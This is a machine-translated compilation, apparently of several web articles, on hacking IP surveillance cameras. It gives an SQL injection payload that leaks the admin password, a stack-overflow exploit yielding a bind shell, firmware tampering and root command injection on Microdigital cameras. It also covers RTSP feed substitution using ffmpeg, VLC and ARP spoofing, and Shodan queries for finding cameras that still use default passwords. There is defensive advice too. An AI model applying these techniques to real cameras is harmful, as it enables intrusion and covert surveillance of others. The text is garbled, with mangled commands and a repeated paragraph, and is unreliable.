When editing these parameters, two requests are sent to the server - a request to modify information and request to receive current settings.

An example of a request for information modification.

And now imagine what it can lead to if the attacker is a professional of his business. All the results obtained using bots can be made to its base and further with the help of starting brute force in the dictionary. Believe the result of successful attacks will be ten times higher!

The processing of such a request is the shift function 0x18374. . At the beginning there is a read-parameter queries (up to 32 bytes each) and check whether they are filled.

Next - Call function Strip. that removes the "Space" symbols and Tabulation at the beginning and at the end of the lines.

Now the obtained lines go to the function that makes SQL request Update. To the SQLite 3 database.

The problem is that when transferring strings is not used % Q. (Safe option), and % S. In connection with which we can go beyond the row and add your SQL instructions to the query (by the way, if an integer parameter is sent, it is best to use % D. ).

Below is an example of operation How to hack a web chamber.

During the processing of this query, the following SQL command is created.

Update Network set ddnsusage = 1, ddnshostname = '', ddnsname = (select / * ', ddnsname =' * / password from / * ', ddnsusername =' * / user limit 1) - ', ddnspassword =' ​​*** ' 

This request will record the password in the open text in the field in the field. DDNSNAME. first account from the table User. . Remains to request current settings DDNS. .

As a result, we got the value of the first user password from the USER table - in our case it root / root. . If we consider that before that, we found a way to bypass authorization, it turns out, the admin password can learn any unauthorized user.

A similar problem can be observed in 25 different GET parameters scattered throughout the web server (part of the parameters is required to be pre-encoded in BASE64).

Stack overflow

When I came out the parameters subject to SQL Injection type attacks, my attention attracted a function that processes the variable Action. shifting 0x155d0. . The beginning of the pseudocode function is on the screenshot.

On the 78th line causes a function Get_val . It takes a line-name largin as an argument and returns the string-value of this variable.

Next is called function Strcat. which takes on the input two pointers to the strings and records the result of the concatenation of these two lines to the first pointer. The problem is that the function Strcat. May cause buffer overflow error. The error occurs, provided that the allocated memory on the stack for the first variable will not be enough to store the result of the addition of two lines and the stack will occur.

The first function argument was announced on the 53rd line.

For this line, four bytes are highlighted, and then a zero byte is placed in the first cell indicating its ending.

It turns out that the stack is required to overflow in the function arguments. Strcat. Send two lines. Then the length of the second string will be more than three bytes (the fourth byte zero and is set automatically).

How to hack a webcam - go to the stage of operation of the found vulnerability as hacking a webcam. To begin with, check which protection is enabled from the executable file.

The NX flag is disabled, which means that you can execute the code located in any area of ​​memory - including the one that we will place in the process of work.

We also check whether the technology of randomization technology is included in the system.

Flag 1This means that the stack address will be random each time. But initially the second argument function Strcat. (That is, the argument of the Get-variable Action) is written to a bunch, and therefore we can use it.

When debugging the program, refused that the return address of the function that causes Strcat. Stored with a shift in 52 bytes.

You can make sure that you can send the following request.

When debugging the executable file process WebParam.fcgi. We get a program error that is trying to go to the address BBBB. .

Now it remains to add the executable code (Shell code) after the return address and overwrite the return address to the address of our malicious code, which is stored on the heap. The example uses the executable code that opens the port 10240. And gives access to the command shell without authorization (Bind Shell).

Request with overwriting the return address to the address of the shell-code (0x00058248)
Request with overwriting the return address to the address of the shell-code (0x00058248)

Checking network activity on the device.

Process 1263 programs WebParam.fcgi. Began to listen to port 10240 on all interfaces. Connect to it through Netcat. .

Shell is available with NOBODY user privileges.

Similar problem of buffer overflow and variable Params. . The method of operation is not very different from the described, so we will not stop on it.

Substitution File Firmware

One of the most popular problems of IoT devices is the lack of signature from the firmware file. Of course, she did not go around this chamber. And how to hack the webcam with this? Everything is simple: we can add your code into the firmware of the device and thus infect it, and so that the recovery will be possible only if there is a memory dump, but it is (and the necessary skills) far from any owner.

The device administrators are available interface to update the firmware (at the bottom of the page).

It is time to remember about the firmware file, which we downloaded from the official site at the very beginning of the article.

This .tar in which files are lying PackageInfo.txt и UpdatePackage_6400.0.8.5.bin. . The second, in turn, turned out to be an archive.

After unpacking, we used the following file hierarchy.

Directors stored all the same files as in the camera file system. That is, we can replace one of them, pack the firmware and send as an update. But you need to look into the file PackageInfo.txt Available after the first unzipping.

On the eighth line indicates the checksum of the .bin file. That is, this field will also need to edit when sending a custom firmware, otherwise the camera will consider the file damaged and the update system ignores it. This vulnerability can be attributed to the RCE type - remote performance of arbitrary system commands.

How to hack the webcam with an increase in privileges

Finally, another vulnerability of the same type, but already with increasing privileges to root! If you insert a MicroSD card into the camera, then from the web interface you can delete files from it.

When you delete a file, the browser sends such a request via HTTP.

For the processing of the request on the server side, all the same app responds WebParam.fcgi. but in this case it transmits it to another program - MainProc . This is also a binary application.

Having studied MainProc I determined that get-variable FileName. combined with a string and transmitted to the function System. without any filtration. And this means that you can execute arbitrary code on behalf of the user who launched MainProc , that is root.

PROF-OF-CONCEPT: Create a file /tmp/test.txt. with a string Hacking .

And now imagine what it can lead to if the attacker is a professional of his business. All the results obtained using bots can be made to its base and further with the help of starting brute force in the dictionary. Believe the result of successful attacks will be ten times higher!
And now imagine what it can lead to if the attacker is a professional of his business. All the results obtained using bots can be made to its base and further with the help of starting brute force in the dictionary. Believe the result of successful attacks will be ten times higher!

In combination with bypass authorization, this bug allows an attacker to gain control over any camera with an open web interface. And, it is likely to use it for further attacks.

How to hack a web camera - Results

During the study, more than ten different, including the critical vulnerabilities of the Microdigital IP cameras were discovered. Full list of twelve CVE You can find the link.

An important point is that the firmware file provided by the manufacturer on the site, common to all six IP cameras of the N series. And most likely, part of the found vulnerabilities are present in other Microdigital devices, which, as mentioned at the beginning of the article, "over 150 models "!

It is also worth mentioning that at the Positive Hack Days 8 conference there was a contest on hacking IP cameras - Cambreaker. Among the experimental was listed and this model. One of the winners of the competition was Ivan Anisena, who, as it turned out, last year found the vulnerability of the implementation of arbitrary SQL queries and with its help bypassed authorization at this chamber.

There is a burning question: how to protect the perimeter from intruders if there is a similar camera in it? To ensure safety you need:

  • Install the camera in a physically inaccessible to the attacker;
  • carefully examine the documentation;
  • Disable unclaimed services, such as FTP;
  • Change all passwords and, preferably, device usernames;
  • Close on the gateway side (most often the router is the router) port-forwarding to the IP camera.

The same list of recommendations can be guided when setting up any other smart device.

Click to Rate this post!

[Total: 1Average: 5]

IP Camera - Connection and View

The latest program from the IVMS-4200 archive (V2.8.2.2_ML) is used to view webcams. Next, you should install it on your computer and run.

After starting, go to the Control Panel tab - "Device Management" - "Add". Now that the IP camera worked correctly fill in:

  • Pseudonym - any name;
  • Address - IP address of the chamber;
  • Port - leave without change: 8000;
  • User - Login from IP Camera
  • Password - Password from IP Camera

Where to take the address, login and password, see pictures below. After how to put the click on the button: "Add". Go to the tab "Control Panel" - "Basic Rakurs".

So that this does not happen to you, and your video surveillance system did not hacked - start understanding this issue, we assume responsibly and ensure the safety of all of your network equipment.

If everything is done correctly, the hacked IP camera will appear in the IVMS-4200 interface. In the case when there is nothing on the screen, try the following IP camera address from the Router Scan program.

Photos ↓

Fans of the film "Eleven Friends of Owen" probably found out the frame that we chose to illustrate this article. The moment when steep guys skillfully replaced the analog signal of the casino video surveillance cameras, sat down in the minds of many. Some are even trying to turn this in real life.

Technical editor of the company RUCAM-VIDEO.

Technologies have changed, now the analogue is preferred by IP cameras, whose hacking methods will be discussed in detail below.

If you are not paranoid, it does not mean that you do not follow you

Most people who are engaged in hacking do it for the sake of entertainment or to get a piece of fame on the Internet. They use well-known "holes" in chambers security systems and lay out, in their opinion, funny videos on popular Internet resources. YouTube is just chisit

Similar videos


We will consider more serious consequences of vulnerability, namely when the cracker does not give out itself and its penetration into the system. Such an attack is usually carefully planned in advance, a week, or even a month before hacking.

As in our example, "Eleven Friends of Owen", it will be about changing the flow in video surveillance systems, just not analog, but a digital signal, namely the RTSP stream.

Since all information in this article is informational in nature and is primarily aimed at liquidating security errors when building a video surveillance system, we do not recommend using a vulnerability that is considered further. That is why the breakdown of the video surveillance network itself will be considered only superficially and the described methods involve open access to the network of an enterprise or private person. Remember that unauthorized access to data may be prosecuted.

The experience of our company shows that the topic is very relevant, since at the commissioning stage of the video surveillance system, many people connect cameras into their system by RTSP links. Either to save time, either by ignorance, or from confidence that it is necessary, many not even think about changing passwords or see which security settings support their camera.

By the way, RTSP (Real Time Streaming Protocol) is a protocol that allows you to manage streaming video in real time. We need to know about it only that with the help of RTSP links we will pick up the video stream from the camera.

We got finally to


, namely, the plan for which we will act:

1. Receiving RTSP links for the camera, the flow from which we want to replace.

2. Preparation of a video file for subsequent broadcast.

3. Broadcast a recorded file.

4. Protection against secondary flow substitution.

Getting RTSP Flow URI

To replace the signal from the camera, you first need to find a video stream that we need. This will require a reference to it using the RTSP protocol. The camera usually transmits multiple images (high and low resolution). The first is used to record, and the second is to broadcast on video surveillance screens. The minimum resolution (most often 320 per 240 pixels) reduces the load on the equipment. For each RTSP stream, the link is often different in one digit in the key.

Different cameras can have different RTSP links, but the general view is approximately following:

RTSP: // [Login: Password @] IP Address: RTSP Port [/ Key]


Decoding Next:

  • Login and password are those used to access the chamber (they may not be);
  • If the link specifies the login and password, then the @ symbol is specified to separate the authorization and IP address;
  • RTSP port for which streaming video control commands are transmitted, the default value is 554;
  • The key is a unique part of the RTSP reference, which may vary depending on the manufacturer and camera model, for example:

/Play1.sdp - instead of "1" indicates the flow number;

/ LIVE / CH00_0 00 - channel number, 0 - flow number;

/ Channel1 - instead of "1" indicates the flow number.

How to find out the RTSP link without having access to the camera?


How to find out the RTSP link without having access to the camera?


Somewhat simple ways:

1. Find a link on the camera manufacturer's website.

2. Search on the Internet sites where links for different camera models are given examples of such sites.



Recording RTSP Flow to File
When we got the necessary RTSP links, you need to record the video broadcast by them, lasting in a few hours. Do not forget that two-ways are used in modern systems, so you need to write both streams at the same time. 
Technical editor of the company RUCAM-VIDEO.

Record the video stream on the RTSP protocol can be using various software. Consider the most popular of them:

ffmpeg, gstreamer and vlc
1. Record flow via FFMPEG 
$ MAN FFMPEGNAS Interested: - Vcodec Copy - Copying video to a file; - Acodec Copy - Copying Audio to File; - RTSP_Transport TCP - Selecting the flow transmission method; - R 25 - Installing frame speeds per second; - Copyts - Copy TimeStamps; - Start_at_Zero - Copy TimeStamps Starting from 00: 00: 00: 000 We send our RTSP link and via Copy Indicate the path and name of the file to which% FFMPEG -I RTSP recording will go: // 554 / SNL / LIVE / 1 / 1 -Copyts -STart_at_Zero -Rtsp_transport TCP -R 25 -Vcodec Copy -Codec Copy /home/line/example/1.avi
The file start started. 
Technical editor of the company RUCAM-VIDEO.

2. Record via VLC

Get acquainted with the set of commands that the VLC-media player offers us using the $ VLC -H command command: - Sout = # file {path} - specify the file in which you want to copy video; - RTSP-TCP - Getting RTSP TCP; - RTSP-FRAME-Buffer-Size = 1000 - buffer so that the video does not crumble when playing; - H264-FPS = 25 - add-on on 25 frames. We put our data and run $ CVLC RTSP: // 554 / SNL / LIVE / 1/1 --RTSP-TCP --RTSP-FRAME-Buffer-size = 1000 --H264-FPS = 25: SOUT = # File {DST = / HOME / LINE / EXAMPLE / 1.AVI} . The VLC window opens and the record will start, when you close the recording window will stop.

3. Recording through GStreamer

Information on working with Gstreamer can be found <a href="httpps://"> here </a> .- RTSPSRC Location = "RTSP: // 554 / CAM / REALMONITOR? CHANNEL = 1 & SUBTYPE = 0 & UNICAST = TRUE & PROTO = ONVIF "- specify the RTSP stream as a data source. - RTPH264DEPAY - in RTSP video comes with small pieces (RTP packages), through RTPH264DePay we will receive video from these bags .- H264PARSE - As can be seen from the name, Parsim H.264 Thread. - Avimux - Collect the stream in AVI, you can also use MP4MUX or MATROSKAMUX (MKV) .- Filesink Location = 1.AVI - specify the file to which video.gst-Launch will be saved -1.0 -V RTSPSRC Location = "RTSP: // 554 / CAM / REALMONITOR? CHANNEL = 1 & SUBTYPE = 0 & UNICAST = TRUE & PROTO = ONVIF"! RTPH264DePay! H264PARSE! MP4MUX! Filesink location = 1.mp4

RTSP stream broadcast from file

It's time to start broadcast the recorded file in the RTSP format. To do this, we use all the same programs reviewed in the section above.

1. To broadcast the video stream from the camera using FFMPEG, you must use FFServer. His description can be found

. In order to set the transmission parameters, it is necessary 
Technical editor of the company RUCAM-VIDEO.

Fill out the file


FFSERVER.CONFRTSPPORT file - set the RTSP port number by which broadcast will go. <Stream SNL / LIVE / 1/1> - After Stream, set the desired key. Format RTP - transmission format. File "/ Home / line / example / 1 .avi "- RTSP_TRANSPORT TCP - specify the path to the file you want to transmit, and the key to transmit via TCP.NoAudio - do not pass the sound. FFServer.confrtspport 554 <Stream SNL / Live / 1/1> Format RTPFILE" / HOME / LINE / EXAMPLE / 1.AVI "-RTSP_TRANSPORT TCPNOAUDIO </ STREAM> Next, run% FFServer -f FFServer.conf.

2. Now use the VLC media player. Despite the fact that this is the easiest way, unfortunately, the VLC can broadcast the stream only via the UDP protocol.
VLC media player 

The command for running the RTSP stream: - Sout = # RTP {SDP = RTSP: // 554 / SNL / LIVE / 1/1} - set a link on which broadcasting will occur. - Repeat - if necessary, put repeated Playing video file.vlc /home/line/example/1.avi --Sout = # RTP {SDP = RTSP: // 554 / SNL / LIVE / 1/1} -Repeat

3. Finally, using GST-Server.


To begin with, it is necessary to install. $ Sudo apt-get install gstreamer1.0 $ wget -RtSp-Server-1.8.3 $ sudo apt install GTK-Doc-Tools / GST-RTSP-Server-1.8.3 $ sudo apt-get install libgstreamer-plugins-base1.0-dev / gst-RTSP-Server-1.8 .3 $ Make Now We can change the file /gst-Rtsp-server-1.8.3/examples/test-launch.catut. You can change the RTSP port that is used by default # define default_rtsp_port "8554" and the key in the linkgst_rtsp_mount_points_add_factory (MOUNTS, " / Test ", Factory). After putting our values ​​to make Make. Now run the Test-Launch file with keys. - RTSPSRC location =" / home / line / example / 1.avi "- path to the file that will play .- H264 Encoder - encoded in H.264.- RTPH264Pay Name = PAY0 PT = 96 - We divide our stream to pieces. $ ~ / GST-RTSP-Server-1.8.3 / ExamPles $ ./test-launch "(RTSPSRC Location =" / Home / Line / Example / 1.AVI "! X264ENC! RTPH264Pay name = PAY0 PT = 96)"

The recorded file is broadcast in the RTSP format, after which we solve the challenge to the output of the chamber. Below are several options that vary depending on the object we want to attack. In fact, ways are much more, consider only the most basic. The first thing we need is to get into the network you need.

If the object is large geographically, it is often possible to approach some cameras physically and even try to find the switching equipment to which the camera is connected.

If the object is small, you can try to enter the network via Wi-Fi and scan it using NMAP, for example.

Also, if there is physical access to the camera, it is possible using one-page package to make a break in several stages:

1) Enable Wireshark recording;

2) shut off the wire from the camera briefly and connect it to one-page;

3) Return the cable into place;

4) explore the logs received.

Or if there is access to the network, you can use the classic substitution method:

- Using ARPSPOOF Stand between the camera and the server;

- using IP_FORWARD to forward requests from a video surveillance server to an IP camera, and vice versa;

- Use IPTables to redirect all requests for the RTSP port to the video surveillance server not from the camera, and from our car.

Protection of video surveillance cameras from hacking

To protect against the flow substitution by the procedure described above, you can use several ways:

How to find out the RTSP link without having access to the camera?


1. Integrating cameras

The largest protection gives the integration of the camera to the software product. Check if your camera is integrated with

Surveillance system "Line"

, can

If your camera or manufacturer did not turn out to be in the list, you can contact

in technical support

With a request to integrate the IP camera model you use.

2. Update firmware

It is necessary to constantly maintain the firmware of the chambers up to date, since using updates, developers correct various vulnerabilities and thereby increase the stability of the cameras.

3. Changing standard logins and passwords

The first thing that makes an attacker will try to use standard login and password of the camera. They are listed in operating instructions, so find them will not be difficult. Therefore, always use unique login and password.

4. Enable mandatory authorization

This function is present in many modern chambers, but unfortunately, not all users know about her. If you disable this option, the camera will not request authorization when connected to it, which will make it vulnerable to hacking. It is worth noting that there are dual authorization cameras for HTTP access and access via the ONVIF protocol. Also in some cameras there is a separate setup to request an authorization when connecting to a direct RTSP link.

5. Filter IP addresses

If the camera supports the function of the so-called white list, it is better not to neglect it. With it, it is determined by the IP address from which you can connect to the camera. It must be the server address to which the camera is connected and, if necessary, the second IP address of the workplace from which the setting is made. But this is not the most reliable method, since the attacker when changing the device can use the same IP address. Therefore, it is best to use this option along with the rest of the recommendations.

6. Network protection

You must correctly configure the switching equipment. Now most switches support protection from ARP Spoofing - Be sure to use it.

7. Network separation

This item should pay special attention to this item, as it plays a big role in the security of your system. The division of the network of the enterprise and the video surveillance network will protect you from intruders or even from their own employees who have access to a common network and want to hack you.

8. Enabling OSD menu You must enable the OSD menu with the current time and the date on the camera so that you can always check the relevance of the image. This is a good way to protect exactly from the replacement of the video order, as OSD is superimposed on all videos running from a specific camera. Even when the attacker enters the RTSP stream, the substitution will be noticeable due to data that will still remain on video frames.

Unfortunately, many attackers learned to quickly find out and take advantage of vulnerabilities in IP video surveillance systems. To secure the network, it is necessary to familiarize yourself with the methods of protection described in this article. Use a sufficient amount of commissioning of the system and especially correctly adjusting all its components. So you can provide networks maximum safety from hacking. -In conclusion, we suggest you share in the comments, how would you come to protect your video surveillance network from hacking? What methods of attack do you consider the most dangerous? -A little theory, then practice ....

Almost all modern digital video surveillance cameras are built on the Linux operating system, which is strongly trimmed and has only the most necessary for work. Linux operating system itself is free, very reliable and resistant to external influences and hacks, so the manufacturer and builds video recorders, video server, video surveillance cameras, NAS and other smart gadgets on its basis. -Under the "hacking video surveillance camera" will understand the receipt of access under the administrator. -Access can be obtained to: -Graphic web interface camera. Having obtained such access, the attacker can view the video, if there is a microphone, hear what is happening, and if there is a two-way audit (microphone and speaker), the dialogue with the victim. All the settings that the device possesses are also available.

SSH operating system or other other protocol. Having access, you will receive the command line. Such a vulnerability was used with large-scale DDOS attacks with hackers with hacked cameras, as well as computing video surveillance power for mining cryptocurrency.

Consider the weaknesses of such devices.

Human factor. The device has standard settings: Standard Login and Password. After installing the equipment, it is necessary to change it.

Questions, comments and suggestions Write on:  

The incompetence of specialists who were engaged in installing and configuring video cameras. You need to understand how the system is built, when using an external IP address, it is necessary to reliably protect the device that looks outside (Internet). Proper attention to devote the protection of Wi-Fi router, which is used almost everywhere where there is an Internet.

The use of standard or weak (less than 8 password characters). For hacking, Brutfors attacks in the dictionary are usually used (inuration method), which contains all standard passwords: Admin, 888888, 123456, 12345 s.t.

To protect the owners, the manufacturer enters additional security measures, for example, for Hikvision on all new devices, activation is required, which forces the owner to set a password, in accordance with the safety requirement: Capital and lowercase letters, numbers and limits the minimum length. There are many hacking methods, consider one of the simplest, using the stodan search engine. The search engine constantly scans the Internet and collects the database on devices that responded to its requests: these are recorders, video surveillance cameras, routers, firewalls, that is, all network devices that look into the worldwide network. Let's try to access, to those devices that have default (standard) passwords. Go to practice. Breaking into! We go to the site: Without registration, we will be limited by the number of requests. Therefore, it is better to go through a simple registration procedure on the site. Next, in the search string we need to enter, what we want to find. Examples of requests for unauthorized access, hacking: DEFAULT PASSWORD PORT: 80 (where default password - devices with standard passwords, port: 80 - serves to receive and transmitting data on HTTP, in our case we are looking for all devices with a web interface). Port: 80 NVR Country: "IT" (We are looking for the NVR-Network Video Recorder device, then you mean DVR; Country: "IT" - only in Italy will be performed). Port: 80 DVR COUNTRY: "RU" (We are looking for DVR devices - Digital Video Recorder (digital video recorders) in Russia). Port: 80 Country: "RU" ASUS

(We are looking for equipment with web interface in Russia The ASUS manufacturer, the greatest extradition will most likely be on routers of this manufacturer).

230 Anonymous Access Granted

(We get access to FTP servers with anonymous access). There are many hacking methods, consider one of the simplest, using the stodan search engine. The search engine constantly scans the Internet and collects the database on devices that responded to its requests: these are recorders, video surveillance cameras, routers, firewalls, that is, all network devices that look into the worldwide network. Android Webcam.

How to hack the camera in 2020

(Android gadgets, which are used as used as webcams).

Server: SQ-Webcam

(This request will display a list of equipment with servers, which has detected webcams).

The full list of commands can be found on the site search engine Shaodan.

And do not forget - when hacking, all the responsibility will be on you! As an example on the first request:

The search database discovered 3278 results. According to the second and third extradition, as seen from Fig. 1, we see that login: admin, and password to access the web interface: 1234.

Добавить комментарий